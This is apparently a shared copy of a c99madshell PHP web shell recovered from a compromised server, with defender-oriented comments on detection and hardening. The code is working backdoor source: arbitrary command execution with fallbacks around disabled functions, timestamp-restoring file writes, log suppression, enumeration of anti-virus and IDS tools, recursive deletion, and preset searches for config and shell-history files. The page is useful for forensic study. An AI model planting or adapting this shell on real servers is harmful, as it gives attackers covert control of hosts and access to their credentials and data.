Last active
November 10, 2023 05:01
Decoded from my hacked server
<?php | |
// Runtime setup of the web shell. Errors are shown in the HTTP response
// (display_errors on) while server-side logging is turned off a few lines
// below, so a failure of this script leaves nothing in the PHP error log.
ini_set('display_errors', 1); | |
ini_set('display_startup_errors', 1); | |
error_reporting(E_ALL); | |
//@ignore_user_abort(TRUE); | |
// Removes the execution time limit for this request.
@set_time_limit(0); | |
// NOTE(review): set_magic_quotes_runtime() was removed in PHP 7.0, so this
// sample appears to have been written for PHP 5.x hosts.
@set_magic_quotes_runtime(0); | |
// Disables the PHP error log for this request (log evasion).
@ini_set('error_log',NULL); | |
@ini_set('log_errors',0); | |
@ini_set('max_execution_time',0); | |
// Credentials for the optional HTTP Basic auth gate. All three are empty in
// this copy; the check later in the file only runs when $login is non-empty.
$login = ""; //Login | |
$pass = ""; //Pass | |
$md5_pass = ""; //If no pass then hash | |
// PHP extensions the status header reports when they are loaded.
$allow_ext = array('mysql','mysqli','ftp','curl','imap','sockets','mssql','sqlite'); | |
// Compilers, interpreters and download tools looked up with which() for the status header.
$allow_program = array('gcc','cc','ld','php','perl','python','ruby','make','tar','nc','locate','suidperl','wget','get','fetch','links','lynx','curl','lwp-mirror','lwp-download'); | |
// Anti-virus, rootkit-scanner, firewall, IDS and integrity-checker binaries
// looked up with which() for the status header, i.e. the shell inventories
// the host's defensive tooling on every page load.
$allow_service = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','tripwire','sxid','logcheck','logwatch'); | |
// All output is buffered; onphpshutdown() later re-emits it through ob_gzHandler.
@ob_start(); | |
@ob_implicit_flush(0); | |
/**
 * Re-emits the buffered page through the ob_gzHandler output callback.
 *
 * Takes the current output buffer, discards it, opens a new buffer with
 * "ob_gzHandler" as callback, echoes the saved content and flushes it.
 * The two globals are declared but not used in this function.
 */
function onphpshutdown() | |
{ | |
global $gzipencode,$ft; | |
$v = @ob_get_contents(); | |
@ob_end_clean(); | |
@ob_start("ob_gzHandler"); | |
echo $v; | |
@ob_end_flush(); | |
} | |
/**
 * Looks up a program on the host by running `which <name>` through myshellexec().
 *
 * $which is concatenated into the command line without escaping. Every call
 * starts a shell process under the web server account, which is visible in
 * process-creation telemetry.
 *
 * @param string $which Program name.
 * @return string|false Output of the command, or false when it is empty.
 */
function which($which) { | |
$locate = myshellexec('which '.$which); | |
if($locate) { | |
return $locate; | |
} else { | |
return false; | |
} | |
} | |
/**
 * Overwrites an existing file while hiding the change from timestamp and
 * permission checks.
 *
 * The modification time (and the original mode, if it had to be loosened) is
 * recorded before the write and restored afterwards.
 * Forensics: mtime-based triage will not show files written through this
 * function; compare content hashes or the inode change time (ctime), which
 * touch() does not reset.
 *
 * @param string $file    Path of the file to overwrite; must already exist.
 * @param string $content New file content.
 * @return bool True after the write, false when the file is missing or cannot be opened for writing.
 */
function save_file($file, $content) { | |
global $win; | |
if(!file_exists($file)) { | |
return false; | |
} | |
clearstatcache(); | |
// Remember the current mtime so it can be put back after the write.
$filetime = filemtime($file); | |
if(!is_writable($file)) { | |
// Keep the last four octal digits of the mode, then open the file up to 0777.
$fileperm = substr(decoct(fileperms($file)), -4, 4); | |
@chmod($file, intval(0777,8)); | |
if(!is_writable($file)) { | |
return false; | |
} | |
} | |
// Mode 'w' truncates the file before writing.
$handle = @fopen($file, 'w'); | |
if($handle === FALSE) { | |
return false; | |
} | |
fwrite($handle, $content); | |
fclose($handle); | |
// Timestamp restore: both mtime and atime are set to the pre-write mtime.
@touch($file, $filetime, $filetime); | |
// Put the original mode back if it was changed above.
if(isset($fileperm) && !empty($fileperm)) { | |
@chmod($file, intval($fileperm,8)); | |
} | |
clearstatcache(); | |
return true; | |
} | |
/**
 * Flushes the buffered output via onphpshutdown() and ends the request.
 *
 * The function declares no parameters; callers in this file pass a message
 * or status value, which is ignored.
 */
function c99shexit() { | |
onphpshutdown(); | |
exit; | |
} | |
/**
 * Recursively collects the paths of all regular files below $dir.
 *
 * Changes the working directory into $dir while reading it and restores the
 * previous one before returning. There is no depth limit.
 *
 * @param string $dir Directory to walk; a trailing separator is added if missing.
 * @return array|false List of file paths, or false when $dir does not exist or cannot be opened.
 */
function RecursFile($dir) { | |
$files = array(); | |
if(substr($dir, -1) != DIRECTORY_SEPARATOR) { | |
$dir .= DIRECTORY_SEPARATOR; | |
} | |
if(!file_exists($dir)) { | |
return false; | |
} | |
clearstatcache(); // Clear the stat cache | |
$realpath = getcwd(); // Save the current working directory | |
$handle = @opendir($dir); | |
if(FALSE === $handle) { | |
return false; | |
} | |
// is_dir()/is_file() below are called on bare entry names, hence the chdir().
chdir($dir); | |
while(FALSE !== ($file = readdir($handle))) { | |
if('.' != $file && '..' != $file ) { | |
if(is_dir($file)) { | |
$recurs = RecursFile($dir.DIRECTORY_SEPARATOR.$file.DIRECTORY_SEPARATOR); | |
if(is_array($recurs)) { | |
$files = array_merge($files, $recurs); | |
} | |
} elseif(is_file($file)) { | |
// Doubled separators produced by the concatenation are collapsed.
$files[] = str_replace(array('\\\\', '//'), DIRECTORY_SEPARATOR, $dir.DIRECTORY_SEPARATOR.$file); | |
} | |
} | |
} | |
closedir($handle); | |
chdir($realpath); // Restore the working directory | |
clearstatcache(); // Clear the stat cache | |
//sort($files); | |
return $files; | |
} | |
/** | |
* Recursively lists all directories below the given one, the start directory included. | |
* | |
* Changes the working directory into $dir while reading it and restores the | |
* previous one before returning. Returns an array of directory paths with | |
* duplicates removed, or false when $dir does not exist or cannot be opened. | |
*/ | |
function RecursDir($dir) { | |
$dirs = array(); | |
if(substr($dir, -1) != DIRECTORY_SEPARATOR) { | |
$dir .= DIRECTORY_SEPARATOR; | |
} | |
if(!file_exists($dir)) { | |
return false; | |
} | |
clearstatcache(); // Clear the stat cache | |
$realpath = getcwd(); // Save the current working directory | |
$handle = @opendir($dir); | |
if(FALSE === $handle) { | |
return false; | |
} | |
chdir($dir); | |
$dirs[] = str_replace(array('\\\\', '//'), DIRECTORY_SEPARATOR, $dir); | |
while(FALSE !== ($file = readdir($handle))) { | |
if('.' != $file && '..' != $file ) { | |
if(is_dir($file)) { | |
$dirs[] = str_replace(array('\\\\', '//'), DIRECTORY_SEPARATOR, $dir.DIRECTORY_SEPARATOR.$file.DIRECTORY_SEPARATOR); | |
$recurs = RecursDir($dir.DIRECTORY_SEPARATOR.$file.DIRECTORY_SEPARATOR); | |
if(is_array($recurs)) { | |
$dirs = array_merge($dirs, $recurs); | |
} | |
} | |
} | |
} | |
closedir($handle); | |
chdir($realpath); // Restore the working directory | |
clearstatcache(); // Clear the stat cache | |
$dirs = array_unique($dirs); | |
return $dirs; | |
} | |
/**
 * Applies one permission mode to every file and directory below $dir.
 *
 * Incident response: a subtree whose entries all carry the same unusual mode
 * can be the trace of this function.
 * NOTE(review): RecursFile()/RecursDir() return false on failure and that
 * value is handed to array_merge() unchecked.
 *
 * @param string $dir  Root of the tree.
 * @param int    $perm Mode passed to chmod().
 * @return string "<succeeded>:<failed>" counters.
 */
function setRecursPerm($dir, $perm) { | |
$good = 0; | |
$bad = 0; | |
$all = array_merge(RecursFile($dir), RecursDir($dir)); | |
foreach($all as $file) { | |
if(@chmod($file, $perm)) { | |
$good++; | |
} else { | |
$bad++; | |
} | |
} | |
return $good.':'.$bad; | |
} | |
// True when PHP runs on Windows.
$win = strtolower(substr(PHP_OS,0,3)) == "win"; | |
// Undo magic-quotes escaping on everything in $GLOBALS.
// NOTE(review): get_magic_quotes_gpc() was removed in PHP 8.0; another sign
// that this sample targets old PHP versions.
if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} | |
// Input is taken from cookies and the POST body only (POST wins on duplicate
// keys); query-string parameters are not merged in. Detection: the operator's
// actions therefore do not appear in the URL field of access logs, which show
// only repeated POSTs to this one path.
$_REQUEST = array_merge($_COOKIE,$_POST); | |
// register_globals emulation: each request key becomes a global variable
// unless a variable of that name is already set.
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} | |
// Static configuration of the shell UI. The version string and the names
// "c99madkibshell" / "c99shell" / "c99madshell" used in this file identify
// the family (c99 derivative) and are usable as content signatures.
$shver = "3.0 BLOG edition"; | |
// $surl may arrive through the request-variable import above; otherwise it
// is the script's own URL path.
if (empty($surl)){ | |
$surl = $_SERVER['PHP_SELF']; | |
} | |
$surl = htmlspecialchars($surl); | |
$timelimit = 0; | |
$login_txt = "Admin area"; | |
$accessdeniedmess = "<a href=\"http://securityprobe.net\">c99madkibshell v.".$shver."</a>: access denied"; | |
$filestealth = TRUE; | |
$curdir = "./"; | |
$tmpdir = ""; | |
$tmpdir_log = "./"; | |
$sort_default = "0a"; | |
$sort_save = TRUE; | |
$safemode_diskettes = array('a'); | |
$hexdump_lines = 8; | |
$hexdump_rows = 24; | |
$nixpwdperpage = 100; | |
// Preset commands offered in the UI: configuration-file discovery,
// world-writable paths, shell history files and listening ports. The same
// command lines appearing under the web server account in process logs are
// an indicator that this shell was used.
if (!$win) { | |
$cmdaliases = array( | |
array("-----------------------------------------------------------", "ls -la"), | |
array("find config.inc.php files", "find / -type f -name config.inc.php"), | |
array("find config* files", "find / -type f -name \"config*\""), | |
array("find config* files in current dir", "find . -type f -name \"config*\""), | |
array("find all writable folders and files", "find / -perm -2 -ls"), | |
array("find all writable folders and files in current dir", "find . -perm -2 -ls"), | |
array("find all .bash_history files", "find / -type f -name .bash_history"), | |
array("find .bash_history files in current dir", "find . -type f -name .bash_history"), | |
array("show opened ports", "netstat -an | grep -i listen") | |
); | |
} else { | |
$cmdaliases = array( | |
array("-----------------------------------------------------------", "dir"), | |
array("show opened ports", "netstat -an") | |
); | |
} | |
// Quick-launch links: each sets the hidden "act" field (search, eval,
// selfremove) of the POST form named "todo" and submits it.
$quicklaunch = array( | |
array("<b><hr>Search</b>","#\" onclick=\"document.todo.act.value='search';document.todo.d.value='%d';document.todo.submit();"), | |
array("<b>PHP-code</b>","#\" onclick=\"document.todo.act.value='eval';document.todo.d.value='%d';document.todo.submit();"), | |
array("<b>Self remove</b>","#\" onclick=\"document.todo.act.value='selfremove';document.todo.submit();"), | |
); | |
// Colours used for PHP source highlighting.
$highlight_background = "#c0c0c0"; | |
$highlight_bg = "#FFFFFF"; | |
$highlight_comment = "#6A6A6A"; | |
$highlight_default = "#0000BB"; | |
$highlight_html = "#1300FF"; | |
$highlight_keyword = "#007700"; | |
$highlight_string = "#000000"; | |
@$f = $_REQUEST["f"]; | |
// Imports every key of the request array "c99shcook" into the current scope.
// extract() overwrites existing variables by default, so request data can
// replace any of the settings assigned above.
@extract($_REQUEST["c99shcook"]); | |
// Optional HTTP Basic auth gate, skipped entirely while $login is empty (as
// in this copy): the shell then answers to whoever requests it, not only to
// the party that planted it.
if (!empty($login)) | |
{ | |
// The password is compared as an unsalted MD5 hash, with a loose (!=) comparison.
if (empty($md5_pass)) {$md5_pass = md5($pass);} | |
if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) | |
{ | |
// NOTE(review): ereg_replace() was removed in PHP 7.0.
if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |<br>"," ",$donated_html));} | |
// The Basic-auth realm contains "c99shell <version>", a network-visible signature.
header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); | |
header("HTTP/1.0 401 Unauthorized"); | |
// c99shexit() takes no parameters, so the message passed here is not printed.
c99shexit($accessdeniedmess); | |
} | |
} | |
// Request parameters, read from the POST body. "act" selects the action,
// "d" the working directory and "f" the file; "d" and "f" are URL-decoded
// once more here. None of the values is validated at this point.
if (isset($_POST['act'])) $act = $_POST['act']; | |
if (isset($_POST['d'])) $d = urldecode($_POST['d']); else $d=getcwd(); | |
if (isset($_POST['sort'])) $sort = $_POST['sort']; | |
if (isset($_POST['f'])) $f = urldecode($_POST['f']); | |
if (isset($_POST['ft'])) $ft = $_POST['ft']; | |
if (isset($_POST['grep'])) $grep = $_POST['grep']; | |
if (isset($_POST['processes_sort'])) $processes_sort = $_POST['processes_sort']; | |
if (isset($_POST['pid'])) $pid = $_POST['pid']; | |
if (isset($_POST['sig'])) $sig = $_POST['sig']; | |
if (isset($_POST['base64'])) $base64 = $_POST['base64']; | |
if (isset($_POST['fullhexdump'])) $fullhexdump = $_POST['fullhexdump']; | |
if (isset($_POST['c'])) $c = $_POST['c']; | |
if (isset($_POST['white'])) $white = $_POST['white']; | |
if (isset($_POST['nixpasswd'])) $nixpasswd = $_POST['nixpasswd']; | |
$lastdir = @realpath("."); | |
@chdir($curdir); | |
// Reads the host's disable_functions setting into an array (empty array when
// nothing is disabled); it is shown in the status header further down.
$disablefunc = @ini_get("disable_functions"); | |
if (!empty($disablefunc)) | |
{ | |
$disablefunc = str_replace(" ","",$disablefunc); | |
$disablefunc = explode(",",$disablefunc); | |
} else { | |
$disablefunc = array(); | |
} | |
/**
 * Shortens a string for display by keeping its head and tail around "...".
 *
 * @param string $content Text to shorten.
 * @param int    $len     Length above which the text is shortened.
 * @return string $content unchanged when it is at most $len bytes long,
 *                otherwise the first and last ceil($len/2)-2 bytes joined by "...".
 */
function str2mini($content,$len) | |
{ | |
if (strlen($content) > $len) | |
{ | |
$len = ceil($len/2) - 2; | |
return substr($content, 0,$len)."...".substr($content,-$len); | |
} | |
else {return $content;} | |
} | |
/**
 * Recursively lists the files below a directory.
 *
 * @param string $start_dir Directory to walk, default '.'.
 * @return array|false Paths of all non-directory entries, or false when
 *                     $start_dir is not a directory.
 */
function listdir($start_dir='.') { | |
$files = array(); | |
if (is_dir($start_dir)) { | |
$fh = opendir($start_dir); | |
while (($file = readdir($fh)) !== false) { | |
# loop through the files, skipping . and .., and recursing if necessary | |
if (strcmp($file, '.')==0 || strcmp($file, '..')==0) continue; | |
$filepath = $start_dir . '/' . $file; | |
if ( is_dir($filepath) ) | |
$files = array_merge($files, listdir($filepath)); | |
else | |
array_push($files, $filepath); | |
} | |
closedir($fh); | |
} else { | |
# false if the function was called with an invalid non-directory argument | |
$files = false; | |
} | |
return $files; | |
} | |
/**
 * Formats a byte count for display with binary units (1 KB = 1024 B).
 *
 * @param int|float|string $size Byte count.
 * @return string|false Value rounded to two decimals with a " GB", " MB",
 *                      " KB" or " B" suffix; FALSE when $size is not numeric.
 */
function view_size($size) | |
{ | |
if (!is_numeric($size)) {return FALSE;} | |
else | |
{ | |
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} | |
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} | |
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} | |
else {$size = $size . " B";} | |
return $size; | |
} | |
} | |
/**
 * Recursively deletes a directory and everything in it (destructive).
 *
 * Entry paths are built as $d.$o, so $d has to end with a directory
 * separator; fs_rmobj() adds it before calling this function.
 *
 * @param string $d Directory path with trailing separator.
 * @return bool True when the directory no longer exists afterwards.
 */
function fs_rmdir($d) | |
{ | |
$h = opendir($d); | |
while (($o = readdir($h)) !== FALSE) | |
{ | |
if (($o != ".") and ($o != "..")) | |
{ | |
if (!is_dir($d.$o)) {unlink($d.$o);} | |
else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} | |
} | |
} | |
closedir($h); | |
rmdir($d); | |
return !is_dir($d); | |
} | |
/**
 * Deletes a file or a whole directory tree.
 *
 * @param string $o Path; backslashes are converted to DIRECTORY_SEPARATOR.
 * @return bool Result of fs_rmdir() for directories or unlink() for files;
 *              FALSE when the path is neither.
 */
function fs_rmobj($o) | |
{ | |
$o = str_replace("\\",DIRECTORY_SEPARATOR,$o); | |
if (is_dir($o)) | |
{ | |
if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} | |
return fs_rmdir($o); | |
} | |
elseif (is_file($o)) {return unlink($o);} | |
else {return FALSE;} | |
} | |
/**
 * Runs an operating-system command and returns its output.
 *
 * Tries the PHP process-execution primitives one after another and uses the
 * first one that is available: exec, shell_exec, system, passthru, popen,
 * proc_open and finally pcntl_fork + pcntl_exec of a Perl interpreter.
 * Hardening: because of this fallback chain, listing only some of these
 * functions in disable_functions does not stop the shell; the chain names
 * the functions a restrictive configuration has to cover.
 * Detection: every branch creates a child process of the PHP/web server
 * process running an arbitrary command line.
 *
 * @param string $cfe Command line, passed on without escaping.
 * @return string Command output; '' for an empty command or when no branch applies.
 */
function myshellexec($cfe) | |
{ | |
$res = ''; | |
if (!empty($cfe)) | |
{ | |
if(@function_exists('exec')) | |
{ | |
@exec($cfe,$res); | |
$res = join("\n",$res); | |
} | |
elseif(@function_exists('shell_exec')) | |
{ | |
$res = @shell_exec($cfe); | |
} | |
elseif(@function_exists('system')) | |
{ | |
// system()/passthru() print directly, so their output is captured with a nested buffer.
@ob_start(); | |
@system($cfe); | |
$res = @ob_get_contents(); | |
@ob_end_clean(); | |
} | |
elseif(@function_exists('passthru')) | |
{ | |
@ob_start(); | |
@passthru($cfe); | |
$res = @ob_get_contents(); | |
@ob_end_clean(); | |
} | |
elseif(@is_resource($f = @popen($cfe,"r"))) | |
{ | |
$res = ""; | |
if(@function_exists('fread') && @function_exists('feof')){ | |
while(!@feof($f)) { $res .= @fread($f,1024); } | |
}else if(@function_exists('fgets') && @function_exists('feof')){ | |
while(!@feof($f)) { $res .= @fgets($f,1024); } | |
} | |
@pclose($f); | |
} | |
elseif(@is_resource($f = @proc_open($cfe,array(1 => array("pipe", "w")),$pipes))) | |
{ | |
$res = ""; | |
if(@function_exists('fread') && @function_exists('feof')){ | |
while(!@feof($pipes[1])) {$res .= @fread($pipes[1], 1024);} | |
}else if(@function_exists('fgets') && @function_exists('feof')){ | |
while(!@feof($pipes[1])) {$res .= @fgets($pipes[1], 1024);} | |
} | |
@proc_close($f); | |
} | |
elseif(@function_exists('pcntl_exec')&&@function_exists('pcntl_fork')) | |
{ | |
// Last resort: command output is not captured in this branch; $res only
// carries the status messages assembled below.
$res = '[~] Blind Command Execution via [pcntl_exec]\n\n'; | |
$pid = @pcntl_fork(); | |
if ($pid == -1) { | |
$res .= '[-] Could not children fork. c99shexit'; | |
} else if ($pid) { | |
if (@pcntl_wifexited($status)){$res .= '[+] Done! Command "'.$cfe.'" successfully executed.';} | |
else {$res .= '[-] Error. Command incorrect.';} | |
} else { | |
// Child process: replaces itself with Perl from one of two fixed paths.
$cfe = array(" -e 'system(\"$cfe\")'"); | |
if(@pcntl_exec('/usr/bin/perl',$cfe)) c99shexit(0); | |
if(@pcntl_exec('/usr/local/bin/perl',$cfe)) c99shexit(0); | |
die(); | |
} | |
} | |
} | |
return $res; | |
} | |
/**
 * Comparison callback: orders two rows by the column whose key is held in
 * the global $v, using natural-order string comparison.
 *
 * @param array $a First row.
 * @param array $b Second row.
 * @return int Result of strnatcmp() on the two column values.
 */
function tabsort($a,$b) | |
{ | |
global $v; | |
return strnatcmp($a[$v], $b[$v]); | |
} | |
/**
 * Renders a numeric file mode as an ls-style string such as "-rwxr-xr-x".
 *
 * NOTE(review): the directory test (0x4000) runs before the block-device
 * test (0x6000), so a block device matches "d" first.
 *
 * @param int $mode Mode as returned by fileperms().
 * @return string Type character followed by nine permission characters,
 *                with s/S and t/T for the setuid, setgid and sticky bits.
 */
function view_perms($mode) | |
{ | |
if (($mode & 0xC000) === 0xC000) {$type = "s";} | |
elseif (($mode & 0x4000) === 0x4000) {$type = "d";} | |
elseif (($mode & 0xA000) === 0xA000) {$type = "l";} | |
elseif (($mode & 0x8000) === 0x8000) {$type = "-";} | |
elseif (($mode & 0x6000) === 0x6000) {$type = "b";} | |
elseif (($mode & 0x2000) === 0x2000) {$type = "c";} | |
elseif (($mode & 0x1000) === 0x1000) {$type = "p";} | |
else {$type = "?";} | |
$owner["read"] = ($mode & 00400)?"r":"-"; | |
$owner["write"] = ($mode & 00200)?"w":"-"; | |
$owner["execute"] = ($mode & 00100)?"x":"-"; | |
$group["read"] = ($mode & 00040)?"r":"-"; | |
$group["write"] = ($mode & 00020)?"w":"-"; | |
$group["execute"] = ($mode & 00010)?"x":"-"; | |
$world["read"] = ($mode & 00004)?"r":"-"; | |
$world["write"] = ($mode & 00002)? "w":"-"; | |
$world["execute"] = ($mode & 00001)?"x":"-"; | |
// setuid (0x800), setgid (0x400) and sticky (0x200) replace the execute character.
if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} | |
if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} | |
if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} | |
return $type.join("",$owner).join("",$group).join("",$world); | |
} | |
// Fallback stubs: when a POSIX function is missing and not listed in
// disable_functions, a replacement that always returns FALSE is defined so
// that later calls do not abort the script.
if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} | |
if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} | |
if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} | |
if (!function_exists("parse_perms")) | |
{ | |
/**
 * Splits a numeric file mode into a type character and boolean flags.
 *
 * @param int $mode Mode as returned by fileperms().
 * @return array Keys "t" (type character), "o", "g", "w" (owner, group,
 *               world), each an array of booleans under "r", "w", "x".
 */
function parse_perms($mode) | |
{ | |
if (($mode & 0xC000) === 0xC000) {$t = "s";} | |
elseif (($mode & 0x4000) === 0x4000) {$t = "d";} | |
elseif (($mode & 0xA000) === 0xA000) {$t = "l";} | |
elseif (($mode & 0x8000) === 0x8000) {$t = "-";} | |
elseif (($mode & 0x6000) === 0x6000) {$t = "b";} | |
elseif (($mode & 0x2000) === 0x2000) {$t = "c";} | |
elseif (($mode & 0x1000) === 0x1000) {$t = "p";} | |
else {$t = "?";} | |
$o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; | |
$g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; | |
$w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; | |
return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); | |
} | |
} | |
/**
 * Parses a sort specification such as "0a" into column and direction.
 *
 * @param string $sort Column number followed by a direction character.
 * @return array [column as int, "d" when the last character is "d", otherwise "a"].
 */
function parsesort($sort) | |
{ | |
$one = intval($sort); | |
$second = substr($sort,-1); | |
if ($second != "d") {$second = "a";} | |
return array($one,$second); | |
} | |
/**
 * Returns the ls-style mode string of a path, coloured by what the PHP
 * process may do with it: red = not readable, white = readable but not
 * writable, green = writable.
 *
 * @param string $o Path.
 * @return string HTML <font> element wrapping view_perms() output.
 */
function view_perms_color($o) | |
{ | |
if (!@is_readable($o)) {return "<font color=red>".view_perms(@fileperms($o))."</font>";} | |
elseif (!@is_writable($o)) {return "<font color=white>".view_perms(@fileperms($o))."</font>";} | |
else {return "<font color=green>".view_perms(@fileperms($o))."</font>";} | |
} | |
/**
 * Recursively searches a directory tree by entry name and, optionally, by
 * file content.
 *
 * Search criteria are read from the global array $a (keys name, name_regexp,
 * text, text_wwo, text_cs, text_regexp, text_not); matches are appended to
 * the global $found and the global counters are incremented. Symbolic links
 * to directories are not followed. Files whose name matches are read in full
 * when a text criterion is set.
 * NOTE(review): ereg() was removed in PHP 7.0.
 *
 * @param string $d Directory to search; a trailing separator is added if missing.
 * @return void
 */
function c99fsearch($d) | |
{ | |
global $found; | |
global $found_d; | |
global $found_f; | |
global $search_i_f; | |
global $search_i_d; | |
global $a; | |
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} | |
$h = opendir($d); | |
while (($f = readdir($h)) !== FALSE) | |
{ | |
if($f != "." && $f != "..") | |
{ | |
// Name match: substring test, or regular expression when name_regexp is set.
$bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); | |
if (is_dir($d.$f)) | |
{ | |
$search_i_d++; | |
if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} | |
if (!is_link($d.$f)) {c99fsearch($d.$f);} | |
} | |
else | |
{ | |
$search_i_f++; | |
if ($bool) | |
{ | |
if (!empty($a["text"])) | |
{ | |
$r = @file_get_contents($d.$f); | |
if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} | |
if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} | |
if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} | |
else {$bool = strpos(" ".$r,$a["text"],1);} | |
if ($a["text_not"]) {$bool = !$bool;} | |
if ($bool) {$found[] = $d.$f; $found_f++;} | |
} | |
else {$found[] = $d.$f; $found_f++;} | |
} | |
} | |
} | |
} | |
closedir($h); | |
} | |
if(!isset($act)) {$act='';} | |
// "gofile" is rewritten to a directory listing ("ls") or a file view ("f")
// depending on what $f points to.
if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} | |
// Anti-caching headers: responses of the shell are not meant to be stored by
// browsers or proxies.
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); | |
header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); | |
header("Cache-Control: no-store, no-cache, must-revalidate"); | |
header("Cache-Control: post-check=0, pre-check=0", FALSE); | |
header("Pragma: no-cache"); | |
// Temporary directory: upload_tmp_dir unless $tmpdir was set.
// NOTE(review): the is_dir() test replaces an existing upload_tmp_dir with
// "/tmp/"; the condition looks inverted.
if (empty($tmpdir)) | |
{ | |
$tmpdir = ini_get("upload_tmp_dir"); | |
if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} | |
} | |
$tmpdir = realpath($tmpdir); | |
$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); | |
if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} | |
if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} | |
else {$tmpdir_logs = realpath($tmpdir_logs);} | |
// Reports the host's PHP restrictions (safe_mode, open_basedir). The labels
// are written from the operator's point of view: a restriction that is
// switched off is shown in green.
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") | |
{ | |
$safemode = TRUE; | |
$hsafemode = "<font color=red>ON (secure)</font>"; | |
} | |
else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";} | |
$v = @ini_get("open_basedir"); | |
if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";} | |
else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";} | |
$sort = @htmlspecialchars($sort); | |
if (empty($sort)) {$sort = $sort_default;} | |
$sort[1] = strtolower($sort[1]); | |
// Server banner with the "PHP/<version>" part removed.
$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),'',getenv("SERVER_SOFTWARE")); | |
@ini_set("highlight.bg",$highlight_bg); //FFFFFF | |
@ini_set("highlight.comment",$highlight_comment); //#FF8000 | |
@ini_set("highlight.default",$highlight_default); //#0000BB | |
@ini_set("highlight.html",$highlight_html); //#000000 | |
@ini_set("highlight.keyword",$highlight_keyword); //#007700 | |
@ini_set("highlight.string",$highlight_string); //#DD0000 | |
if (!isset($actbox) || !is_array($actbox)) {$actbox = array();} | |
// Only $act is HTML-escaped here; $d is URL-encoded into $ud.
$dspact = $act = htmlspecialchars($act); | |
$disp_fullpath = $ls_arr = $notls = null; | |
$ud = urlencode($d); | |
?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - c99madshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: 